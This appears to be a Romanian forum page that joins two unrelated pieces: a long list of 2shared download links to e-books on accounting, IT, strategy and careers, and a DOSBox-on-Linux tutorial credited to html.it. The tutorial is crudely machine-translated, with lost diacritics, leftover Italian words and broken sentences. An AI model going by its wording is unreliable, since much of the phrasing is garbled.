http://www.2shared.com/document/F6HNs0fe/financial-econometrics-eviews.html Download : http://www.2shared.com/document/HN8s-QaV/dynamic-costing.html Download : http://www.2shared.com/document/yEKp70Fo/liabilities-and-equity.html Download : http://www.2shared.com/document/1HHbmuSc/liabilities-and-equity-exercis.html Download : http://www.2shared.com/document/8QGo-Np_/liabilities-and-equity-exercis.html Download : http://www.2shared.com/document/sXkVGUNN/liabilities-and-equity-exercis.html Download : http://www.2shared.com/document/gGzllYEI/long-term-assets.html Download : http://www.2shared.com/document/cegguDTu/long-term-assets-exercises-i.html Download : http://www.2shared.com/document/um9ggRnX/long-term-assets-exercises-ii.html Download : http://www.2shared.com/document/rG-aBlC2/long-term-assets-exercises-iii.html Download : http://www.2shared.com/document/kyrOja2b/managerial-and-cost-accounting.html Download : http://www.2shared.com/document/hcI6tKAe/managerial-and-cost-accounting.html Download : http://www.2shared.com/document/LaZyIici/managerial-and-cost-accounting.html Download : http://www.2shared.com/document/TwxPNrwz/portfolio-theory-financial-ana.html Download : http://www.2shared.com/document/46gzGnIx/strategic-financial-management.html Download : http://www.2shared.com/document/kHTRk3gY/strategic-financial-management.html Download : http://www.2shared.com/document/1DyD4rJD/the-accounting-cycle.html Download : http://www.2shared.com/document/DctzHqYh/using-accounting-information.html Download : http://www.2shared.com/document/6NCQ6IgU/using-accounting-information-e.html Download : http://www.2shared.com/document/_4lZVUyR/using-accounting-information-e.html Accounting videos : http://bookboon.com/en/textbooks/accounting-video IT & Programming : Download : http://www.2shared.com/document/cHkyy_H1/access-2010-part-i.html Download : http://www.2shared.com/document/JNwwzIXL/access-2010-part-ii.html Download : http://www.2shared.com/document/vUZHQzeA/access-2010-part-iii.html Download : http://www.2shared.com/document/ZLFFNWtj/an-introduction-of-java-progra.html Download : http://www.2shared.com/document/pLgXyoOL/access-2010-part-iv.html Download : http://www.2shared.com/document/fFXEfPZq/an-introduction-to-java-progra.html Download : http://www.2shared.com/document/7OqR4WMn/an-introduction-to-java-progra.html Download : http://www.2shared.com/document/_PyI3IuT/an-introduction-to-relational-.html Download : http://www.2shared.com/document/Q60B75sE/applications-of-prolog.html Download : http://www.2shared.com/document/oEZMJPvy/artificial-intelligence-agent-.html Download : http://www.2shared.com/document/jUyVQVh6/artificial-intelligence-agents.html Downlaod : http://www.2shared.com/document/exgMeBLW/artificial-intelligence-exerci.html Download : http://www.2shared.com/document/Sr-9dvBq/control-engineering-matlab.html Download : http://www.2shared.com/document/zUc2jA5H/c-programming-in-linux.html Download : http://www.2shared.com/document/OMhsxBq1/digital-image-processing-part-.html Download : http://www.2shared.com/document/7zgBdRsW/digital-image-processing-part-.html Download : http://www.2shared.com/document/UZ5G5h09/digital-systems-design.html Download : http://www.2shared.com/document/q4i6QBk6/excel-2010-advanced.html Download : http://www.2shared.com/document/EF4gINn4/excel-2010-introduction-part-i.html Download : http://www.2shared.com/document/3Zpvxjrv/excel-2010-introduction-part-i.html Download : http://www.2shared.com/document/a_v15o5T/fundamentals-of-media-security.html Download : http://www.2shared.com/document/pdsN6TfE/gentle-introduction-to-mathema.html Download : http://www.2shared.com/document/SyKRGYMN/introduction-to-biological-sig.html Download : http://www.2shared.com/document/jf5xQ3b6/introduction-to-digital-signal.html New 2 - Business strategy : Download : http://www.2shared.com/document/pzlnWYTR/business-models.html Download : http://www.2shared.com/document/GnohDt82/company-valuation-and-share-pr.html Download : http://www.2shared.com/document/pDt2Xe4l/company-valuation-and-takeover.html Download : http://www.2shared.com/document/ZTBT02LS/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/NElSWILR/corporate-valuation-and-takeov.html Download : http://www.2shared.com/document/O7NY3jxD/operations-strategy.html Download : http://www.2shared.com/document/xhxGQLcA/strategic-financial-management.html Download : http://www.2shared.com/document/fmFDS3H6/strategic-financial-management.html Download : http://www.2shared.com/document/kcBZOwNP/strategicmanagement.html Download : http://www.2shared.com/document/h8J-3iAn/strategic-marketing.html Download : http://www.2shared.com/document/DZsJKuJi/studying-strategy.html Download : http://www.2shared.com/document/eqTJmBJY/thinking-strategically.html Nano tehnologie : Download : http://www.2shared.com/document/KuRiQQmQ/micro-and-nano-transport-of-bi.html Download : http://www.2shared.com/document/Y9rnu0Te/nano-technology.html New 3 - Career Secrets & Networking Download : http://www.2shared.com/document/KJjFQXbA/career-secrets-exposed.html Download : http://www.2shared.com/document/94LNW4Jl/creating-your-cv-as-a-self-mar.html Download : http://www.2shared.com/document/ob2GXmYl/demystifying-case-interviews.html Download : http://www.2shared.com/document/wnazutG0/essential-job-searching-tools.html Download : http://www.2shared.com/document/qyQ43jyD/graduate-employment-333-tips-f.html Download : http://www.2shared.com/document/dXY59F4-/ignite-your-career.html Download : http://www.2shared.com/document/UQ8lB-CM/interview-secrets-exposed.html Download : http://www.2shared.com/document/xGgx4WVn/managing-your-career.html Download : http://www.2shared.com/document/sk8XsEgK/mba-education.html Download : http://www.2shared.com/document/K4ZcoSkd/networking-english.html Download : http://www.2shared.com/document/zVsM7Nt-/planning-for-new-opportunities.html Download : http://www.2shared.com/document/Th5IHTYx/resume-secrets-exposed.html Download : http://www.2shared.com/document/UfcXWtM7/stress-measurement-in-less-tha.html Download : http://www.2shared.com/document/nEtVg0fb/the-fastest-way-to-the-job-int.html Download : http://www.2shared.com/document/BpBWcggG/time-to-get-hired.html Download : http://www.2shared.com/document/LcwqVeEl/working-abroad.html Download : http://www.2shared.com/document/MC_Ff_XW/working-abroad-european-perspe.html New 4 - Statistics : Download : http://www.2shared.com/document/zrhT9w0U/statistics-compendium.html Download : http://www.2shared.com/document/A8hvixUX/statistics-exercise-book.html Download : http://www.2shared.com/document/Cudi-flF/statistics-for-business-and-ec.html Download : http://www.2shared.com/document/MdZM5XYD/statistics-for-health-life-and.html Download : http://www.2shared.com/document/mqQLTFY6/stats-practically-short-and-si.html Download : http://www.2shared.com/document/boK3l-wI/stress-measurement-in-less-tha.html Petroleum, Gas & Oil download books Voi actualiza acest thread in timp

Emulare DoS pe LINUX Cine a inceput sa foloseasca un PC de cel pu?in cincisprezece ani în urm?, nu poate sa nu simta o anume nostalgie fa?? de sistemul s?u de operare în primul rând, care pentru mul?i a fost Dos. Exist? unele programe care sunt mândru de faptul c? în mod inevitabil, nu mai avem capacitatea de a utiliza, deoarece nu mai este sus?inut? de sistemele de operare moderne. Desigur, se încadreaz? în aceast? categorie anumite jocuri video, într-un moment în care acest lucru a fost un nou tip de divertisment. Fani de Super Mario, Lemmings, Pacman, vor fi încânta?i s? ?tie c? exist? un proiect care î?i propune s? imite, chiar ?i pe Linux, un PC ?i ofer? utilizatorilor un sistem de operare este pe deplin compatibil cu DOS. Acesta este : DOSBox, an x86 emulator with DOS un proiect bazat pe DOSEMU Main Page conceput în mod explicit pentru a face posibil? pentru a rula jocuri vechi care au fost orfani de acest sistem de operare. O caracteristic? foarte interesant? a acestui program este de a fi în m?sur? pentru a putea rula pe sisteme de operare cele mai populare: Windows, MacOSX, Linux, FreeBSD, ?i chiar BeOS ?i acum este pensionara OS / 2. Cerin?ele de sistem sunt relativ mari, este recomandat s? ave?i un procesor cu cel pu?in 1 GHz viteza de ceas, deoarece unele jocuri vor lucra cu hardware-ul mai puternic. Dup? ce a?i lansa executabil va, într-o fereastr?, o sesiune DOS, complet cu boot ?i de ini?ializare a dispozitivelor, cum ar fi placa de sunet. Prompt? va fi exact la fel ca cel folosit de DOS ?i comenzile sale se pot utiliza unele dintre DOSBox pentru a interac?iona cu sistemul de operare pe care l-au lansat (GNU / Linux, în cazul nostru), în a?a fel încât s? se asocieze un director special pentru o identificarea unit??ilor. Am g?sit personal DOSBox foarte util pentru o gam? larg? de aplica?ii, nu jocuri, pe care am fost nevoit s? aib? de a rula sub Linux. În ultimul timp, de exemplu, au considerat c? este foarte util pentru a încerca un asamblor vechi, precum ?i o serie întreag? de programe care nu mai sunt dezvoltate, dar care ar putea fi utile din timp în timp, au posibilitatea de a utiliza. Ar putea fi foarte util, de exemplu, pentru acele laboratoare de informatica, care sunt obligate s? foloseasc? unele software-ul care ruleaz? sub DOS. Dac? la prima vedere acest lucru poate p?rea ca o scuza buna pentru a sta departe de GNU / Linux, acum cu DOSBox (?i DOSEMU, din care deriv?) nu mai este. Vom vedea în urm?toarea parte a articolului cum se configureaz? acest program ?i vom examina comenzile pe care interfa?a are de oferit. În prima parte a articolului am analizat poten?ialul oferit de DOSBox. Acum este timpul pentru a vedea ac?iune. Vom începe cu instalarea: este foarte probabil ca distributia are deja, pe supor?i proprii, oficiale de pachete pre-compilate. Cu Debian ?i Ubuntu doar s? (ca de obicei), ca root: apt-get update apt-get install dosbox DOSBox, în timp ce multe în comun cu DOSEMU, este mult mai u?or de configurat ?i de utilizat si este deja cu fir pentru a fi utilizate în domeniul de "divertisment". Este atât mai complex, deoarece acesta ofer?, de asemenea, emulare de CPU ?i nu imita doar un sistem de operare DOS. Apoi continua?i cu configurarea. Este posibil de a ac?iona cu privire la set?rile de DOSBox printr-un fi?ier de configurare. Acest pas nu este necesar, cu toate acestea, deoarece set?rile implicite vor fi bine, în cele mai multe cazuri. Ceea ce vom încerca s? analiz?m sunt op?iunile care pot fi oferite la momentul execu?iei. Apoi, deschide?i un terminal ?i lansa DOSBox f?r? nici un parametru. Va fi pornit si va fi prezentat cu o astfel de prompt ca litera Z: \. Sub Dos vom vedea, de obicei, C ?i z.Motivul este simplu, si are de a face cu securitatea datelor tale. Z: înseamn? c? nu este de fi?ierele pe parti?ia (s? zicem, un simplu pentru a observa), dar sistemul de fi?iere. La acest punct va fi de pân? la utilizatorul care directorul s? fie vizibile în DOSBox, dar ?ine cont de faptul c? suntem ofer? acces gratuit la fi?ierele noastre c? lansarea cererilor de DOS. Ceva poate merge întotdeauna gre?it, o eroare (spun c? este r?u), dar poate fi întotdeauna ascuns ?i fi?ierele noastre pot ajunge r?u. Prin urmare, ar trebui s? alege?i cu aten?ie ceea ce vrei sa faci, punând probabil totul sub un director special creat. La acest punct am dori s? facem ceva, pentru a executa programe. S? presupunem c? avem fi?iere în directorul / home / user / DOS ?i dori?i s? fac? vizibil acest director ca unitatea C. Din DOS prompt, care este afi?at de lansare DOSBox: mount C “/home/utente/DOS” La acest punct, vom putea accesa unitatea C, cu clasic C:, ?i rula?i comanda noastr? Dos. Am observat, totu?i, o anumit? incompatibilitate între DOSBox ?i tastatur? italian? (ca s? fiu sincer cu toate tastaturile care nu sunt american). Acest lucru nu ofer? capacitatea de a afi?a caractere speciale, cum ar fi dou? puncte ( sau slash (/).Problema poate fi rezolvat? în mai multe moduri: simplu ?i mai pu?in elegant este de a schimba tastatura sub X, lansarea setxkbmap-ne de terminalul înainte de a începe DOSBox. În acest moment, aspectul va fi cea a unui tastatur? american, care este recunoscut în mod corect. Alternativ, putem începe s? DOSBox, folosind CTRL + F1, începe keymapper, un utilitar pentru modificarea aspectului tastaturii. O alt? posibilitate este de a utiliza Keyb FreeDOS proiect, programul de DOS pentru a schimba aspectul tastaturii. O op?iune foarte convenabil de DOSBox este c-comanda cu aceasta, pute?i începe imediat dup? lansarea unei comenzi. De exemplu, dac? lanciassimo de la terminalul: dosbox -c “MOUNT C /home/utente/DOS” Acest lucru va avea ca efect rula programul nostru si au asociat ca directorul unit??ii C / home / user / DOS. În acest moment am doar trebuie s? l?sa?i praful de pe unele vechi de floppy în c?utarea pentru un joc plecat de acolo abandonat într-un sertar pentru prea mult timp. http://www.html.it/articoli/emulare-dos-in-linux-1/